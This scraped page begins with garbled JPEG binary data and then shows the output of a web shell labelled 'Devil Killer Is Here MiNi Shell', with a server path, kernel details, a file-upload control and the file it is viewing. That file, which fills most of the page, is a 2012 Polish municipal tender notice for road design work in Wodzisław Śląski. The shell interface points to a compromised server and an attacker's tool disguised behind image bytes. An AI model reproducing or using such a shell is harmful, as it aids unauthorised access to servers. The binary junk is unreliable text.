JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/174604-N-2012.html

<p class="kh_header"><b>Wodzisław Śląski: Wykonanie dokumentacji architektoniczno - budowlanej oraz sprawowanie nadzoru autorskiego dla zadania inwestycyjnego pn.: Budowa drogi do obsługi strefy inwestycyjnej (łącznik Młodzieżowa  - Olszyny)</b><br>
<b>Numer ogłoszenia: 174604 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Wodzisław Śląski , ul. Bogumińska 4, 44-300 Wodzisław Śląski, woj. śląskie, tel. 32 4590431, faks 32 72 187 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodzislaw-slaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji architektoniczno - budowlanej oraz sprawowanie nadzoru autorskiego dla zadania inwestycyjnego pn.: Budowa drogi do obsługi strefy inwestycyjnej (łącznik Młodzieżowa  - Olszyny).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie projektu budowlanego i wykonawczego oraz nadzór autorski dla zadania pn. Budowa drogi do obsługi strefy inwestycyjnej (łącznik Młodzieżowa-Olszyny).


UWAGA :  Dokumentacja projektowa i przetargowa winna być zgodna z przepisami na dzień wydania Zamawiającemu dokumentacji.     

Szczegółowy zakres przedmiotu zamówienia.
Opracowanie projektu budowlanego i wykonawczego  w zakresie :
Budowa drogi zbiorczej na odcinku od skrzyżowania z ul. Młodzieżową do skrzyżowania z ul. Olszyny o dł. ok. 0,6 km. 
	- Przekrój drogi: 1/2
	- Szerokość pasa ruchu: 3,5 m
	- Chodnik jednostronny
            - Przepust drogowy
            - klasa drogi  Z 
Ogólne parametry techniczne drogi :


- Klasa drogi: Zbiorcza
- Kategoria ruchu: KR 4
- Prędkość projektowa: 50 km/h
Uwaga ogólna:
Jeżeli w trakcie sporządzania projektów Wykonawca stwierdzi, że konieczna jest zmiana parametrów określonych w niniejszej SIWZ to zobowiązany jest do przedstawienia propozycji zmiany parametrów Zamawiającemu. Zmiana parametrów może nastąpić jedynie za zgodą Zamawiającego.	    
Dokumentacja winna zawierać m.in. : 


1. Analizę ruchu w stanie istniejącym i prognoza ruchu na 2030r.
2. Mapę do celów projektowych
3. Projekt zagospodarowania terenu
4. Wniosek o ustalenie lokalizacji drogi w trybie ustawy  z 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U.  z 2003 r.  Nr 80 poz. 721 z póź zm.).
5. Dokumentację dotyczącą kanału technologicznego w pasie drogowym zgodnie z art. 39 pkt. 6 Ustawy o drogach publicznych (Dz.U.  z 2007 r.  Nr 19 poz. 115 z póź zm.).
6. Dokumentacja geologiczno- inżynierska z geotechnicznymi warunkami posadowienia obiektów.
7. Projekt drogowy - budowlany i wykonawczy
8. Projekt organizacji ruchu 
9. Projekt organizacji ruchu na czas budowy
10. Projekt oświetlenia ulicznego - budowlany i wykonawczy
11. Projekt kanalizacji deszczowej - budowlany i wykonawczy
12. Projekt przepustu - budowlany i wykonawczy
13. Projekty rozwiązań przewidzianych wymaganiami raportów np. budowa ekranów akustycznych itp.
14. Planszę zbiorczą istniejącego i projektowanego uzbrojenia
15. Projekty usunięcia ewentualnych kolizji z istniejącym uzbrojeniem
16. Specyfikację techniczną wykonania i odbioru robót
17. Informację dotyczącą bezpieczeństwa i ochrony zdrowia
18. Przedmiar robót 
19. Kosztorys inwestorski
20. Projekt podziału działek
21. Opracowanie wszelkich niezbędnych materiałów potrzebnych do uzyskania decyzji ZRID, a w szczególności: a) Przygotowanie kompletnych wniosków opracowanych w oparciu o obowiązujące przepisy wraz z materiałami niezbędnymi do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji. b) Sporządzenie dokumentacji geodezyjno-prawnej (w tym operatu geodezyjnego podziału działek) dla wszystkich działek obejmujących teren inwestycji,
22. Decyzje o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięć uzyskane przez Wykonawcę w imieniu Zamawiającego,  
23. Decyzja o Zezwoleniu na Realizację Inwestycji Drogowej uzyskanej w imieniu Zamawiającego
24. Raporty o oddziaływaniu przedsięwzięcia na środowisko, w przypadku stwierdzenia konieczności ich wykonania przez organy wydające decyzje o środowiskowych uwarunkowaniach zgody na realizację inwestycji oraz w zakresie określonym w postanowieniach właściwych organów;
25. W przypadku kolizji z drzewami lub krzewami szczegółową inwentaryzację zieleni sporządzoną w formie opisowej i graficznej (na kopii aktualnej mapy syt.-wys., obejmującej projekt zagospodarowania terenu); 
26. Operat wodno - prawny wraz z uzyskanym w imieniu Zamawiającego pozwoleniem wodno - prawnego;
Wykonawca winien wykonać wszystkie pomiary, badania i opracować potrzebne materiały projektowe niezbędne dla uzyskania opinii, uzgodnień i decyzji wymaganych przepisami szczególnymi, które mogą wystąpić w trakcie uzgadniania dokumentacji.
Przedmiot zamówienia należy dostarczyć w 6 egz. oraz w 2 egz. wersji elektronicznej (płyta CD w formatach PDF, lub: xls, doc, dwg, dxf).

SZCZEGÓŁOWE WYMAGANIA DOTYCZĄCE DOKUMENTACJI:
Przedmiot zamówienia należy opracować zgodnie z poniższymi wytycznymi:
Dokumentacja geologiczno- inżynierska z geotechnicznymi warunkami posadowienia obiektów.
Dokumentacja geologiczno-inżynierska dla potrzeb budowy drogi, infrastruktury, obiektów inżynierskich itp. zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dn. 24.12.1998 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych. 
Mapa do celów projektowych 
Powinna być sporządzona w skali 1:500 lub 1:1000 i posiadać klauzulę właściwego ośrodka dokumentacji geodezyjnej oraz spełniać wymagania określone w:
ustawie z dnia 17 maja 1989 roku Prawo geodezyjne i kartograficzne (Dz. U.  z 2005 r. nr 240, poz. 2027 z późn. zm.),
rozporządzeniu ministra gospodarki przestrzennej i budownictwa z dnia 21 lutego 1995 roku w sprawie rodzaju opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie,
Aktualizacja  treści mapy zasadniczej musi dotyczyć nakładek tematycznych S+U+W+E (sytuacja, uzbrojenie, wysokość, ewidencja).

Wniosek o ustalenie lokalizacji inwestycji celu publicznego
Opracowany zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu  przestrzennym (Dz. U.  z 2003 r. nr 80, poz. 717 z późn. zm.).
Wniosek wraz z materiałami niezbędnymi do uzyskania decyzji o uwarunkowaniach środowiskowych
Opracowany zgodnie z ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2006 r. nr 129 poz. 902 z późn. zm.) łącznie z ustawą z dnia 18 marca 2005 roku o zmianie ustawy  - Prawo ochrony środowiska oraz niektórych innych ustaw. Integralną częścią wniosku powinna być informacja o planowanym przedsięwzięciu, opracowana zgodnie z art. 49 ust. 3 powyższej ustawy.
Raport oddziaływania na środowisko
Powinien być opracowany w przypadku, jeżeli w czasie procedury dotyczącej postępowania w sprawie oceny oddziaływania na środowisko wyniknie konieczność jego wykonania (zgodnie z Rozporządzeniem Rady Ministrów z dnia 9 listopada 2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z  kwalifikowaniem przedsięwzięć do sporządzenia raportu oddziaływania na środowisko, Dz. U. nr 257, poz. 2573 z późn. zm.). W tym postępowaniu zostanie również określony jego zakres. Wszelkie opracowania dla tego elementu dokumentacji powinny być wykonane w zakresie określonym w postanowieniach właściwych organów oraz zgodnie z ustawą Prawo ochrony środowiska.
Zakres Dokumentacji projektowej
wykonanie dokumentacji projektowej zgodnie z Rozporządzeniem Ministra Infrastruktury dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.04.202.2072 z dnia 16 września 2004 r.) obejmującej:
projekt budowlany - zgodnie z Rozporządzeniem Ministra  Infrastruktury z dnia 3 lipca 2003 r.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120,1133 z dnia 10 lipca 2003 r. z pózniejszymi zmianami).
projekty wykonawcze
przedmiar robót
informację dotyczącą bezpieczeństwa  i ochrony zdrowia,
opracowanie Specyfikacji Technicznej  Wykonania i Odbioru Robót Budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
(Dz.U.04.202.2072 z dnia 16 września 2004 r.),
opracowanie kosztorysu inwestorskiego zgodnie  Rozporządzeniem Ministra  Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym  (Dz.U.04.130.1389 z dnia 8 czerwca 2004 r.) z jednokrotną aktualizacją,
uzyskanie  wszystkich niezbędnych uzgodnień i decyzji zgodnie z obowiązującymi w tym zakresie przepisami,
pełnienie nadzoru autorskiego nad realizacją przedmiotowej inwestycji.

Projekt budowlany
Szczegółowy zakres i forma projektu budowlanego powinny przede wszystkim spełniać wymagania określone w ustawie Prawo budowlane (Dz.U.03.120,1133 z dnia 10 lipca 2003 r. z pózniejszymi zmianami), w tym określone w art. 34 ust. 1, 2 i 3 oraz Rozporządzeniu Ministra  Infrastruktury z dnia 3 lipca 2003 r.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.03.120,1133 z dnia 10 lipca 2003 r. z późniejszymi zmianami),  rozporządzeniu w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2004 r. nr 204, poz.2086) a także w Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 r. w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz.U. Nr 63  poz. 735).
Projekty wykonawcze
Celem tego opracowania projektowego jest uzyskanie niezbędnych danych dla potrzeb wykonania, odbioru i rozliczenia robót budowlanych. Projekty wykonawcze powinny obejmować swoim zakresem również zabezpieczenie i/lub ewentualną przebudowę kolidujących urządzeń infrastruktury technicznej.
Projekt wykonawczy będzie się składać m.in. z następujących części:
opisu technicznego,
części rysunkowej,
uzgodnienia branżowego elementów sieci uzbrojenia w rejonie projektowanych robót.
Projekty wykonawcze powinny być sporządzone dla wszystkich urządzeń infrastruktury technicznej, które znajdują się w obszarze projektowanych robót.
Przedmiar robót
Przedmiar robót powinien być wykonany dla wszystkich branż i wszystkich robót objętych dokumentacją projektową zgodnie z § 6,7,8,9 i 10 rozporządzenia w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U.  z 2004 r.nr 202, poz.2072 z późn. zm.) z wersją elektroniczną zapisaną w ogólnie dostępnym formacie (np. .doc, .xsl .pdf,);
Specyfikacje techniczne wykonania i odbioru robót budowlanych
Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych (SST)  powinny być wykonane dla danej dokumentacji projektowej i uwzględniać pełny zakres projektów wykonawczych. SST powinny zawierać szczegółowe wymagania od wykonawcy robót w zakresie: materiałów, sprzętu, transportu zewnętrznego i technologicznego w ramach placu budowy, sposobu wykonania robót, kontroli jakości zrealizowanych robót, sposobu obmiaru do ich odbioru i rozliczenia, metod i zasad odbioru robót wykonanych, podstaw płatności za roboty itd. SST powinny uwzględniać warunki techniczno - budowlane i obowiązujące normy określone w art. 30 Prawa zamówień publicznych.
Projekt docelowej organizacji ruchu i projekt zmiany organizacji ruchu na czas budowy
Projekt organizacji ruch powinien być wykonany zgodnie z rozporządzeniem ministra infrastruktury z dnia 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (Dz. U. z 2003 r. nr 177, poz.1729).
Operat wodno - prawny
Powinien być wykonany zgodnie z ustawą z dnia 18 lipca 2001r. Prawo wodne (Dz. U. z 2005 r. nr 239, poz.2019 z późn. zm.). 
Informacja dotycząca bezpieczeństwa i ochrony zdrowia
Powyższa informacja powinna być wykonana zgodnie z rozporządzeniem ministra infrastruktury w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. nr 120, poz. 1126).
Inwentaryzacja zadrzewienia i plan wyrębu
Inwentaryzacja oraz plan wyrębu ma być załącznikiem do wniosku o uzyskanie pozwolenia
 na wycinkę drzew i krzewów, który powinien być opracowany zgodnie z ustawą z dnia 16
 kwietnia 2004r. o ochronie przyrody (Dz. U. z 2004 r. nr 92, poz. 880 z późn. zm.).
Kosztorys inwestorski
Kosztorys inwestorski powinien odpowiadać wymaganiom określonym w rozporządzeniu ministra infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. nr 130, poz.1389). Na żądanie Zamawiającego Wykonawca wykona aktualizację kosztorysu inwestorskiego, uwzględniając ceny materiałów, sprzętu i robocizny obowiązujące na dzień aktualizacji wyznaczony przez Zamawiającego (bez dodatkowego wynagrodzenia) z wersją elektroniczną zapisaną w ogólnie dostępnym formacie (np. .doc, .xsl .pdf,) oraz w programie kosztorysowym NORMA PRO;

Wykonawca zobowiązany jest czynnie uczestniczyć w procesie uzyskiwania wszystkich opinii, uzgodnień i decyzji związanych z przedmiotem zamówienia,

Projekty należy opracować na aktualnym podkładzie geodezyjnym,

Do każdego projektu budowlanego należy dołączyć:
Uprawnienia budowlane projektanta i sprawdzającego,
Zaświadczenia o ich przynależności do właściwej izby samorządu zawodowego,
Oświadczenia projektantów o opracowaniu dokumentacji zgodnie z obowiązującymi przepisami prawa i zasadami wiedzy technicznej,
-    Informację dotyczącą bezpieczeństwa i ochrony zdrowia.

Dokumentacja musi być wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi, normami, wytycznymi i być kompletna z punktu widzenia celu, któremu ma służyć. Musi być opracowana w oparciu o aktualny miejscowy plan zagospodarowania przestrzennego miasta Wodzisławia Śl., o aktualne warunki techniczne wszystkich gestorów sieci, i obejmować wszystkie branże oraz zawierać wszystkie dokumenty, uzgodnienia, opinie, pozwolenia, decyzje niezbędne do uzyskania przez Zamawiającego zamierzonego celu.

Dokumentacja projektowa będzie służyła jako opis przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane, w związku z czym nie może zostać opisana przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką rozwiązania i nie można jej opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga składania wadium w  kwocie 3.600 zł.
     Wadium należy wnieść przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu, 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędno­ściowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DzU z 2007 r. nr 42, poz. 275 ze zm.). Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek banko­wy zamawiającego: PEKAO o/ Rybnik 19 1240 4357 1111 0010 3970 9094</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat, licząc od dnia wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonaniem co najmniej 3 usług projektowych odpowiadających  swoim rodzajem usłudze stanowiącej przedmiot zamówienia, polegającej na projektowaniu dróg co najmniej klasy  Z   o łącznej długości 1,5 km oraz  obiektów mostowych co najmniej klasy obciążeń B (1 projekt)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże, że dysponuje lub będzie dysponował przy realizacji zadania osobami z uprawnieniami w zakresie niezbędnym do wykonania zamówienia tj. 
- główny  projektant (branża drogowa) jedna osoba posiadająca  uprawnienia budowlane  projektowe bez ograniczeń  w specjalności  drogowej, która wykonała  w okresie od momentu uzyskania  uprawnień, trzy projekty budowlane budowy, przebudowy dróg co najmniej klasy Z o długości łącznej 1,5 km,
- sprawdzający (branża drogowa) jedna osoba posiadająca  uprawnienia budowlane projektowe  bez ograniczeń  w specjalności  drogowej, która zaprojektowała lub sprawdziła w okresie od momentu uzyskania  uprawnień, trzy projekty budowlane budowy, przebudowy dróg co najmniej klasy Z o długości łącznej 1,5 km,
- projektant (branża mostowa)  jedna osoba  posiadająca uprawnienia budowlane projektowe mostowe lub konstrukcyjno - budowlane bez ograniczeń, która wykonała, w okresie od momentu uzyskania  uprawnień,  trzy projekty budowlane obiektów mostowych klasy obciążeń co najmniej B,
- sprawdzający (branża mostowa) jedna osoba, posiadająca uprawnienia budowlane projektowe mostowe lub konstrukcyjno - budowlane bez ograniczeń, która w okresie od momentu uzyskania  uprawnień, zaprojektowała lub sprawdziła trzy  projekty budowlane obiektów mostowych co najmniej klasy obciążeń B,
- projektant (branża instalacyjna do sieci kanalizacyjnych) - jedna osoba, posiadająca  uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- projektant (branża instalacyjna do sieci elektroenergetycznych)  - jedna osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- specjalista ds. oceny oddziaływania na środowisko.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Projektana, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1. Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
2. Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 
